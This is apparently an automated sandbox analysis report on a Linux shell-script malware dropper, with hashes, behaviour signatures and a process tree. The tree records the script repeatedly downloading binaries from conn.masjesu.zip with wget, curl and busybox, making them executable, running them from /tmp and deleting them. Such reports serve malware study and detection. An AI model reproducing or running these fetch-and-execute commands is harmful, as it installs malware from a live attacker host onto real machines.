Analysis
- max time kernel: 95s
- max time network: 97s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 15/10/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-mipsel-20240611-en
General
- Target: 86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
- Size: 10KB
- MD5: 5b7965317583f6ec3ecb200b64ab84dc
- SHA1: 242199969bb87b8f91c50399dbc9a2fcfa918cb9
- SHA256: 86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0
- SHA512: 53de4e8bcba6392755c42f5be1d230e71dbcd45fae9f4be439577b82097ac9039117b0ffed7bfe710b8e3bf6546d6c771c9b799d5b0c902e961fd5b43daf05b7
- SSDEEP: 96:YV1hXrraLcgAGdJdVPd2ZdTUcg69wLwsxLxpMLK9XKlK9l90+YWGuaYaUaG1l/VR:PAaSJSds6Pv8EdPvF8kKc
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:739
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:766
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:794
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:796
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:833
-
-
/bin/chmodchmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:879
-
-
/bin/chmodchmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:911
-
-
/bin/chmodchmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:975
-
-
/bin/chmodchmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:982
-
-
/bin/chmodchmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1010
-
-
/bin/chmodchmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
